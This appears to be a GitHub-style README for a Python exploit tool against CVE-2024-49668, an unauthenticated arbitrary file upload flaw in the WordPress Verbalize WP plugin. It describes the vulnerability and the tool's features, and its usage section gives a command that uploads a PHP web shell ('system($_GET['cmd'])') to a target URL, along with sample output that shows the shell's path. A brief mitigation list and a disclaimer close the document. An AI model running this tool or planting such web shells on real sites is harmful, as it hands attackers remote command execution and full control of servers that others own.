# 🚨 CVE-2024-49668: WordPress Verbalize WP Plugin Arbitrary File Upload Vulnerability

## 📋 Overview

**CVE-2024-49668** is a critical vulnerability in the WordPress Verbalize WP plugin versions 1.0 and below. This vulnerability allows unauthenticated attackers to upload arbitrary files, including web shells, to the web server. The issue arises due to insufficient input validation and file type restrictions during file upload.

### Details

- **Published:** 2024-10-23
- **Updated:** 2024-10-23
- **Title:** WordPress Verbalize WP plugin <= 1.0 - Arbitrary File Upload vulnerability
- **Description:** Unrestricted Upload of File with Dangerous Type vulnerability in Admin Verbalize WP Upload a Web Shell to a Web Server. This issue affects Verbalize WP from n/a through 1.0.
- **CWE:** [CWE-434: Unrestricted Upload of File with Dangerous Type](https://cwe.mitre.org/data/definitions/434.html)
- **CVSS Score:** 10.0 (Critical)
- **Vector String:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

## 🛠️ Exploit Script

This Python script exploits the CVE-2024-49668 vulnerability to upload a shell file to the target WordPress site using the Verbalize WP plugin.

### Features

- **Automated Vulnerability Check:** The script verifies if the target site is vulnerable by checking the plugin version in `readme.txt`.
- **File Upload:** Uploads a PHP shell file to the target site.
- **Path Extraction:** Extracts and displays the full path to the uploaded shell file.

## 🧰 Requirements

- Python 3.x
- `requests` library

Install the required library using pip:

```sh
pip install requests
```

## 🚀 Usage

```sh
usage: 
CVE-2024-49668.py [-h] -u URL [-s SHELL]

Execute a POST request to a WordPress site.

options:
  -h, --help         show this help message and exit
  -u, --url URL      Target URL
  -s, --shell SHELL  Shell code to upload
```

### Example

By default, the script will upload a PHP shell that executes `phpinfo()`. 

```sh
python CVE-2024-49668.py -u http://target.com
```

You can also specify a custom PHP shell code to be uploaded:

```sh
python CVE-2024-49668.py -u http://target.com -s "<?php system($_GET['cmd']); ?>"
```

## 📄 Script Output

```plaintext
The site is vulnerable. Exploiting version: 1.0. Uploading file...
Shell path: /wp-content/uploads/audio-text/4091/audio-demo.php
Exploit By: Nxploit, Khaled ALenazi
```

## 📚 Additional Information

### Vulnerability Impact

The CVE-2024-49668 vulnerability enables attackers to gain full control over the target server by uploading malicious files. Exploiting this vulnerability can lead to severe consequences including data breaches, unauthorized access, and potential defacement of the website.

### Best Practices for Mitigation

To protect your WordPress site from this vulnerability, it is recommended to:

- Update the Verbalize WP plugin to the latest version that addresses this issue.
- Implement strong file upload validations to restrict file types and sizes.
- Regularly monitor your server logs for any suspicious activities.

### Legal Disclaimer

This tool is intended for educational purposes only. Unauthorized use of this tool against websites without explicit permission from the owner is illegal. The authors are not responsible for any misuse or damage caused by this tool.




---
*Created on 2025-03-22 by Nxploited , Khaled alenazi*
